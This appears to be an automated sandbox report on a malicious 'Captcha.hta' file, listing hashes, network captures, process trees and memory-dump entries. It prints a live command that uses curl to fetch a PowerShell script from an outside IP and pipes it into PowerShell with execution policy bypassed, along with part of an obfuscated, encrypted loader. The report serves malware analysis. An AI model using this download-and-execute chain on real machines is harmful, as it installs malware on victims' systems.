                            MD5:3436A973D83850B1791F9A24A9ABA1A2
                            SHA1:5748C9BB6DC920ECF55276512E7AE515868DE28B
                            SHA-256:BC6683030C532242EB5FD25AE2D9B94E7C8BAA3C6E3B9CD0DA1784BD28F88405
                            SHA-512:760486E734A104C2B77EE2E5CC7D5737A2C69593A07B73EB7C6743BC6C0249C6BA908064E0012B83EDB7A1A9D156064F543806EAE2AB15E256A6460251236505
                            Malicious:false
                            Reputation:low
                            Preview:@...e...........................................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\curl.exe
                            File Type:ASCII text, with CR, LF line terminators
                            Category:dropped
                            Size (bytes):399
                            Entropy (8bit):3.1639985315173025
                            Encrypted:false
                            SSDEEP:6:I2swj2SAykymUeg/8Uni1qSgOgcdivId2jEI/b:Vz6ykymUexb1U9cdd8j
                            MD5:C3D21437B008DBBEB56EFD44728CC91B
                            SHA1:12564C752E15C7E1B25CF618B7044DBE00FE9212
                            SHA-256:237984B04F3A318CF87A2D84E0DA655FFC13347AA15195B4749774FF394DC384
                            SHA-512:9F0C2A2D34E3A6D29E15A8FFD74A13416DAA87E8399B99DE7BAE6B0BDD6BDF4C2BEAF806A21E9B909433896D1095B4ACF199700AC3588F790F611D1609CF7333
                            Malicious:false
                            Preview: % Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0.100 4062 100 4062 0 0 2853 0 0:00:01 0:00:01 --:--:-- 2858..
                            File type:HTML document, ASCII text, with very long lines (2054), with CRLF line terminators
                            Entropy (8bit):3.4714896811582254
                            TrID:
                              File name:Captcha.hta
                              File size:2'097 bytes
                              MD5:a7045bcb116c3d85f1ff3706bec2b920
                              SHA1:4ff06af316d7e0453c948d358065d71301ea204a
                              SHA256:8abf12e3a919213c8ff825c1cc1df070990156d829bd5c55d6ce2f6974d77272
                              SHA512:81be5feffa1fec60145eaf21f4918a69dceb346d818560c38f9fc9ef0d972b6137b6778c3134a5a3d8e03bab1790fa1193c2ccffbd6beaf2388a1a12a9d4c4c0
                              SSDEEP:24:q0d+2xhZjaVKR581JlcwHHR/ubvp+l0Eze5RJehY63OrFRBb:qaX3Z/I3H90vgl85nCPwF7
                              TLSH:1D41A17C6621C88EAC337E7BECA87F60D254AF13EDC9A6C4081540863FE1469B5547DA
                              File Content Preview:<script language="javascript">..document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%20%20%20%20%20%20%20%20%28%66%75%6E%63%74%69%6F
                              TimestampSource PortDest PortSource IPDest IP
                              Dec 12, 2024 17:24:05.160686016 CET4973080192.168.2.4147.45.44.131
                              Dec 12, 2024 17:24:05.280864954 CET8049730147.45.44.131192.168.2.4
                              Dec 12, 2024 17:24:05.281610012 CET4973080192.168.2.4147.45.44.131
                              Dec 12, 2024 17:24:05.368139029 CET4973080192.168.2.4147.45.44.131
                              Dec 12, 2024 17:24:05.487937927 CET8049730147.45.44.131192.168.2.4
                              Dec 12, 2024 17:24:06.569601059 CET8049730147.45.44.131192.168.2.4
                              Dec 12, 2024 17:24:06.569658041 CET8049730147.45.44.131192.168.2.4
                              Dec 12, 2024 17:24:06.569696903 CET8049730147.45.44.131192.168.2.4
                              Dec 12, 2024 17:24:06.569735050 CET8049730147.45.44.131192.168.2.4
                              Dec 12, 2024 17:24:06.569746017 CET4973080192.168.2.4147.45.44.131
                              Dec 12, 2024 17:24:06.570101023 CET4973080192.168.2.4147.45.44.131
                              Dec 12, 2024 17:24:06.593683004 CET4973080192.168.2.4147.45.44.131
                              Dec 12, 2024 17:24:06.713992119 CET8049730147.45.44.131192.168.2.4
                              Dec 12, 2024 17:24:06.714102983 CET4973080192.168.2.4147.45.44.131
                              • 147.45.44.131
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.449730147.45.44.131806852C:\Windows\SysWOW64\curl.exe
                              TimestampBytes transferredDirectionData
                              Dec 12, 2024 17:24:05.368139029 CET194OUTGET /infopage/bgfi.ps1 HTTP/1.1
                              Host: 147.45.44.131
                              User-Agent: curl/7.83.1
                              Accept: */*
                              X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                              Dec 12, 2024 17:24:06.569601059 CET1236INHTTP/1.1 200 OK
                              Date: Thu, 12 Dec 2024 16:24:06 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Last-Modified: Thu, 12 Dec 2024 14:54:49 GMT
                              ETag: "fde-62913e55b5974"
                              Accept-Ranges: bytes
                              Content-Length: 4062
                              Data Raw: 0d 0a 24 47 78 47 74 62 41 35 67 36 50 20 3d 20 27 6c 6b 6a 31 4f 30 38 72 2b 72 77 43 42 42 4a 45 51 2b 50 48 72 30 49 46 4c 4d 43 43 71 43 66 39 42 59 4b 54 76 75 44 73 2b 4f 73 3d 27 0d 0a 24 63 50 49 6c 78 63 38 5a 6b 63 20 3d 20 27 41 6f 47 4b 72 4f 71 57 76 57 6d 55 64 4d 55 31 62 31 55 66 68 41 3d 3d 27 0d 0a 24 62 53 35 38 54 51 72 4f 73 4b 20 3d 20 27 6e 39 39 63 46 4d 35 34 4e 31 53 62 7a 44 6a 6d 34 59 6d 33 6b 2f 63 6c 71 2b 70 33 51 36 62 69 61 78 55 55 34 6c 5a 6c 30 5a 65 4e 4a 58 38 57 66 75 54 39 34 42 68 62 78 6d 54 73 78 55 6d 75 44 4a 4e 72 56 32 55 43 36 68 66 53 79 35 52 34 50 76 72 55 76 35 49 6b 36 56 71 4f 34 75 54 59 74 6b 2f 49 65 63 6c 65 67 75 62 6f 6a 41 78 74 46 42 38 36 48 49 6f 47 79 70 48 64 34 4e 70 41 5a 53 6d 58 68 77 4e 48 37 69 62 46 46 4d 77 4d 48 75 54 75 79 4a 6d 4e 73 55 53 47 77 47 34 38 36 2f 59 4a 6d 72 58 63 59 56 4c 53 4e 39 5a 64 2b 74 77 2b 62 6b 37 4a 73 41 33 64 44 59 37 6c 55 31 49 35 54 34 4c 6c 31 66 42 39 4b 58 6d 32 53 4f 52 6d 79 71 51 49 55 [TRUNCATED]
                              Data Ascii: $GxGtbA5g6P = 'lkj1O08r+rwCBBJEQ+PHr0IFLMCCqCf9BYKTvuDs+Os='$cPIlxc8Zkc = 'AoGKrOqWvWmUdMU1b1UfhA=='$bS58TQrOsK = 'n99cFM54N1SbzDjm4Ym3k/clq+p3Q6biaxUU4lZl0ZeNJX8WfuT94BhbxmTsxUmuDJNrV2UC6hfSy5R4PvrUv5Ik6VqO4uTYtk/IeclegubojAxtFB86HIoGypHd4NpAZSmXhwNH7ibFFMwMHuTuyJmNsUSGwG486/YJmrXcYVLSN9Zd+tw+bk7JsA3dDY7lU1I5T4Ll1fB9KXm2SORmyqQIUPXcREqKt6nssoWmwdBJCNPlRi9V9c0t3WYL1OhxVDrhWP8eJTHT4cAfrE6ph5F9XlOJNHNkgrYo9t06zHXuEUYupZSOC+mgMprq0qgushwBI2UHKhr4KFpySuCNl13Lk97M9Tt4bP3R2FApynJ8Es+nA5TIywJ/YbNVXXFecrCGi4vITP+eAdfo6/dPIymJBGvfnMNUmxs/xOOxKSQWNOcrnMOrRbnXkHMDL9l3fJg4O4EIGZEreMCYpwPNNwORWp/djz5/qdWmXDVKvIPrNhYUcvf/UYF1/lRZHt7ob1l3aYzUOTX186LRDp+GvUpya5K30tSCakxnaSfJS2IhKayIqC9UBOerlIKHQdhWN4zvDIjYQoQdq3zaNzeW4/GaSHcW/Mu8A9qSV6EdLhREmQ9Afu111FAOKmE1QWSCAHSiTbjVZtuUpMaMFd6wFd1aVzj8tw6tN3R6xgmIl2mF1ThKG+mCrpQ9J8IH+MS8Mksr3HHZc41Y+sj9D/kerAmdsWs1wP2/SvQ3CrexJym5k3NHxi0HJJYkqBcNYgd70LSydtOrRVYbIOCFN5mKja2HsINv/7mGdIIaAVFtlhscxqgr99xpHHTAM8Qaiyej74yHWohpVLoYDF8OOdJH2ueobbZ1U/TWvzxLcXxRBc6CykDt0hXdc+4c4Hu [TRUNCATED]
                              Dec 12, 2024 17:24:06.569658041 CET1236INData Raw: 78 43 6b 44 42 2f 42 63 4a 67 4e 78 67 53 32 58 79 51 42 76 37 44 73 63 2b 39 55 51 76 4e 2f 2b 6e 6b 49 43 30 32 61 30 50 77 33 50 79 6f 63 57 6a 70 59 35 6a 4b 53 54 36 7a 43 34 77 6f 69 32 79 71 42 37 34 56 70 72 61 59 54 74 6d 46 44 2b 2b 4a
                              Data Ascii: xCkDB/BcJgNxgS2XyQBv7Dsc+9UQvN/+nkIC02a0Pw3PyocWjpY5jKST6zC4woi2yqB74VpraYTtmFD++JZUtQd4nXgWa4augomtMQ0hbyPnpGrXHF9GXJuFrWQ3DU4eYOHM8hARCZiDZjmdek6J2NBTUBqnQLYMuSX0LlfV4ySt4mtAysMidNeu0h3NEnD9CCQYRJ4C6jkS1cw7CHSZ/xfhg0KA1TsZDN4EnQ7W/OTTs8HikgO
                              Dec 12, 2024 17:24:06.569696903 CET1236INData Raw: 36 79 48 56 74 4e 42 4a 78 38 4b 75 34 67 74 54 57 58 77 31 6e 4f 64 52 32 33 6a 4f 42 66 31 53 4d 46 6e 52 79 58 76 6e 4d 56 5a 66 41 4f 52 78 57 65 48 68 30 31 43 4e 4f 75 6a 7a 64 75 75 4b 73 68 63 46 73 54 44 5a 50 61 39 71 49 59 50 71 49 6b
                              Data Ascii: 6yHVtNBJx8Ku4gtTWXw1nOdR23jOBf1SMFnRyXvnMVZfAORxWeHh01CNOujzduuKshcFsTDZPa9qIYPqIkvq7B4ahxLTEzUFIY+tsm4p8LbSyUz3kBDxlQxvkzMpPTtIY9uFR1604yzDFYyREnxfkZ1YGgpjF9PbXBOgVbILdbyvXzA9zmlGuZhAr94M5ihRVlUPiVXFByLOLl5zp7vCI9C74Vznx9RMP3mo0qgfMOzFg0KYCxr
                              Dec 12, 2024 17:24:06.569735050 CET559INData Raw: 24 4c 6a 50 6a 4d 46 67 6f 68 42 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 49 4f 2e 4d 65 6d 6f 72 79 53 74 72 65 61 6d 28 2c 20 24 35 69 37 50 6c 4b 43 46 33 4f 29 0d 0a 20 20 20 20 24 68 35 45 4a 35 39 62 64 55 65 20 3d 20
                              Data Ascii: $LjPjMFgohB = New-Object System.IO.MemoryStream(, $5i7PlKCF3O) $h5EJ59bdUe = New-Object System.Security.Cryptography.CryptoStream($LjPjMFgohB, $umwc79rKWr, [System.Security.Cryptography.CryptoStreamMode]::Read) $Jj6nHrzNgV = New-Obje


                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Click to jump to process

                              Target ID:0
                              Start time:11:24:03
                              Start date:12/12/2024
                              Path:C:\Windows\SysWOW64\mshta.exe
                              Wow64 process (32bit):true
                              Commandline:mshta.exe "C:\Users\user\Desktop\Captcha.hta"
                              Imagebase:0xc00000
                              File size:13'312 bytes
                              MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              Target ID:1
                              Start time:11:24:03
                              Start date:12/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -
                              Imagebase:0x240000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:2
                              Start time:11:24:03
                              Start date:12/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:4
                              Start time:11:24:03
                              Start date:12/12/2024
                              Path:C:\Windows\SysWOW64\curl.exe
                              Wow64 process (32bit):true
                              Commandline:curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1
                              Imagebase:0x190000
                              File size:470'528 bytes
                              MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              Target ID:5
                              Start time:11:24:03
                              Start date:12/12/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:powershell -NoProfile -ExecutionPolicy Bypass -Command -
                              Imagebase:0xcc0000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Reset < >
                                Memory Dump Source
                                • Source File: 00000000.00000003.1687562252.0000000006B10000.00000010.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_3_6b10000_mshta.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                • Instruction ID: 403428135fae638edc582f9d5d09f873dc588ad58f688226d6c95d7ca77559c2
                                • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                • Instruction Fuzzy Hash:
                                Memory Dump Source
                                • Source File: 00000000.00000003.1687562252.0000000006B10000.00000010.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_3_6b10000_mshta.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                • Instruction ID: 403428135fae638edc582f9d5d09f873dc588ad58f688226d6c95d7ca77559c2
                                • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                • Instruction Fuzzy Hash:
                                Memory Dump Source
                                • Source File: 00000000.00000003.1687562252.0000000006B10000.00000010.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_3_6b10000_mshta.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                • Instruction ID: 403428135fae638edc582f9d5d09f873dc588ad58f688226d6c95d7ca77559c2
                                • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                • Instruction Fuzzy Hash:
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1710734621.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_af0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: \VLm
                                • API String ID: 0-2808160488
                                • Opcode ID: 34c4feb487fcad7d74d290ff19cd555a002cd69b41b4ccc624ea80ce98547be4
                                • Instruction ID: 77ab149e5fa5b29257b5b5b1bc2656f03596e425de0dddeb15087fe5e0c346dd
                                • Opcode Fuzzy Hash: 34c4feb487fcad7d74d290ff19cd555a002cd69b41b4ccc624ea80ce98547be4
                                • Instruction Fuzzy Hash: F8B14C70E1020DCFDF10DFE9C8857AEBBF2AF88354F148129E955A7294EB749846CB91
                                Memory Dump Source
                                • Source File: 00000005.00000002.1710734621.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_af0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 118bd337666c2c53ea7fef140bdda76a3717af2c064b315d10d43c6fa25092a6
                                • Instruction ID: 7b1cacab7435ca0f5d5e236ff5049b139a4ab419f06e52740ac5e14d4698b018
                                • Opcode Fuzzy Hash: 118bd337666c2c53ea7fef140bdda76a3717af2c064b315d10d43c6fa25092a6
                                • Instruction Fuzzy Hash: 28B16F70E0020D8FDB10DFEAC9957EDBBF2AF48364F148129E515EB294EB749845CB81
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1710734621.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_af0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: \VLm$\VLm
                                • API String ID: 0-1686317364
                                • Opcode ID: c0eefeb32819b3797f3533b911e32eca86120809fc2ecdc6f046b7be2d4aa9c2
                                • Instruction ID: 5d3f6e727eb7793d0fdc76c752e834abd82376846ccbf9d912eb9fb68f7301a4
                                • Opcode Fuzzy Hash: c0eefeb32819b3797f3533b911e32eca86120809fc2ecdc6f046b7be2d4aa9c2
                                • Instruction Fuzzy Hash: DC7139B0E0020DDFDB14CFAAC9817EEBBF2AF88314F148129E515A7254EB749856CF95
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1710734621.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_af0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: ILm
                                • API String ID: 0-1004251861
                                • Opcode ID: fa161be23ec3fbbe914cce89c22fed9a85301b5fec964b3e41c9fa0066a6f287
                                • Instruction ID: 7baa566d6c3ae4ad82291a3a0c8f76f64c2033d18da7119017591614ddf52de0
                                • Opcode Fuzzy Hash: fa161be23ec3fbbe914cce89c22fed9a85301b5fec964b3e41c9fa0066a6f287
                                • Instruction Fuzzy Hash: 90313C30B042688FCB2ADB70C8547AEB7B2AF89344F0044E9E50A9B355DF359E41CF41
                                Memory Dump Source
                                • Source File: 00000005.00000002.1710734621.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_af0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4d113b036a0aa7479898067d9bf27c8f277e5de85d44dfce332fe898b9f5cfa0
                                • Instruction ID: 70028595efce3d7f6f557ec7ff782f2b3970a06ee05bbf6fa3e632af362e57ab
                                • Opcode Fuzzy Hash: 4d113b036a0aa7479898067d9bf27c8f277e5de85d44dfce332fe898b9f5cfa0
                                • Instruction Fuzzy Hash: C0F15C71A05258AFCB02DFA8D490AADFFB1BF49310F258196E444AB362C775ED85CB90
                                Memory Dump Source
                                • Source File: 00000005.00000002.1710734621.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_af0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7e138fc1a5f0bd2e91eb50a5714471428adafedca131698c8c88d039fe9ba9c5
                                • Instruction ID: 8841abe8c068b7c7c91e6d1a90d449cbd55228de64c3bd89d3435a4f71becc01
                                • Opcode Fuzzy Hash: 7e138fc1a5f0bd2e91eb50a5714471428adafedca131698c8c88d039fe9ba9c5
                                • Instruction Fuzzy Hash: A5D1B33190A3D85FC703DB68D9A05E9BFB0AF07320B1A41D7E494DF2A3C2249D89C7A5
                                Memory Dump Source
                                • Source File: 00000005.00000002.1710734621.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_af0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 75bbe7e8df8a447df68d8af2b6d265afa552dae524688a480093c5cd58ca94a8
                                • Instruction ID: 79d176e301ad46a6c76e09c985a2ad50efef1d691dee15fbfd776b5e0e79aec4
                                • Opcode Fuzzy Hash: 75bbe7e8df8a447df68d8af2b6d265afa552dae524688a480093c5cd58ca94a8
                                • Instruction Fuzzy Hash: 0ED11774A0021CAFCB05DF99D584AADFBB2FF48320F258559E908AB365C731ED85CB90
                                Memory Dump Source
                                • Source File: 00000005.00000002.1710734621.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_af0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6036328592f760bf4898dae1a3a8ba2d139c28ea584ae2660958b06fac471c2e
                                • Instruction ID: e6af9c4faeee2f0b69fce8c248093b8fd8621282357a444f627f44b5ec79c6de
                                • Opcode Fuzzy Hash: 6036328592f760bf4898dae1a3a8ba2d139c28ea584ae2660958b06fac471c2e
                                • Instruction Fuzzy Hash: 5781392184E3E95FD703AB7C99604E67F70AE0722071A01D7D0D0CF2A3D6289D8DC7A6
                                Memory Dump Source
                                • Source File: 00000005.00000002.1710734621.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_af0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7f43f0b7e835fd047a5a293a57bdad6d75ec8545592c0d71a7df9fa72378712a
                                • Instruction ID: 2f262d8426204845874f5ee2563545cb7b787902ec82421b7d4b44c912bd5498
                                • Opcode Fuzzy Hash: 7f43f0b7e835fd047a5a293a57bdad6d75ec8545592c0d71a7df9fa72378712a
                                • Instruction Fuzzy Hash: C2918EB4A006498FCB15CF99C494ABEFBB1FF88310B248599E915AB365C735FC51CBA0
                                Memory Dump Source
                                • Source File: 00000005.00000002.1710734621.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_af0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7195171c47aac547a298eeac68eaf7381207e872e761c97ca64375db659070ae
                                • Instruction ID: 0d059c4d2a36105a59afbaf896b678eec44d07d3b85cb7c0ddb836b75387fdd0
                                • Opcode Fuzzy Hash: 7195171c47aac547a298eeac68eaf7381207e872e761c97ca64375db659070ae
                                • Instruction Fuzzy Hash: 7141A1343402009FD308EB79C595B6AB696EFC4302F10C579A20A8F7A6CF75ED498BA1
                                Memory Dump Source
                                • Source File: 00000005.00000002.1710734621.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_af0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a7dde7ba194af5740672d70c1394b32b7e01b89e973b9de8087f9491e492fc90
                                • Instruction ID: f725d8686308e1fdb5fba023b9a9dd1c8b0101bebae5358ac2d91f7e5ff0ad6e
                                • Opcode Fuzzy Hash: a7dde7ba194af5740672d70c1394b32b7e01b89e973b9de8087f9491e492fc90
                                • Instruction Fuzzy Hash: 213180709092999FCB02CF5DD9908EABFB1FF4A3207154197E444DB362C635AD85CBA1
                                Memory Dump Source
                                • Source File: 00000005.00000002.1710734621.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_af0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4ac2598636f353188be9f4f9a9b8193fc462851e943d7cdb57b10acf491eb8c8
                                • Instruction ID: 1ed71d8666883f53ca3c2b8ed9973769b5ac0e83a00e2daafbe38fbe73efc6b5
                                • Opcode Fuzzy Hash: 4ac2598636f353188be9f4f9a9b8193fc462851e943d7cdb57b10acf491eb8c8
                                • Instruction Fuzzy Hash: 07318075A04209DFCB01CF99C4909AABBB1FF49310B15419AE509DB361C735ED41CBA0
                                Memory Dump Source
                                • Source File: 00000005.00000002.1710408888.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_9dd000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3838672e3a0bb442138edbed735e2d45f8a262d6e5b50bc530dc2311d9ce663d
                                • Instruction ID: ebd3722de14c97d5c7660a582a1e5738f446290d9df42422f67f438a7a588787
                                • Opcode Fuzzy Hash: 3838672e3a0bb442138edbed735e2d45f8a262d6e5b50bc530dc2311d9ce663d
                                • Instruction Fuzzy Hash: D2213871584204DFDB14EF14D9C4B2ABF69FB84324F24C57AD9494F345C33AD846D661
                                Memory Dump Source
                                • Source File: 00000005.00000002.1710408888.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_9dd000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c8f3727de54873e8030d11aacf73dce27006497fb130020675d8ff5ce7e740ff
                                • Instruction ID: 0f825ba91ea89b94d61a78acb213268e32a916e4ee3b9c832ab622247d2e5510
                                • Opcode Fuzzy Hash: c8f3727de54873e8030d11aacf73dce27006497fb130020675d8ff5ce7e740ff
                                • Instruction Fuzzy Hash: 15212675684205DFDB04EF14DAC4B26BBA5FB84314F24CA6EE8094F356C37AD846CA61
                                Memory Dump Source
                                • Source File: 00000005.00000002.1710408888.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_9dd000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e9867b41209b1ae96989907f61c5f808f60e730aab7477091df5884716147213
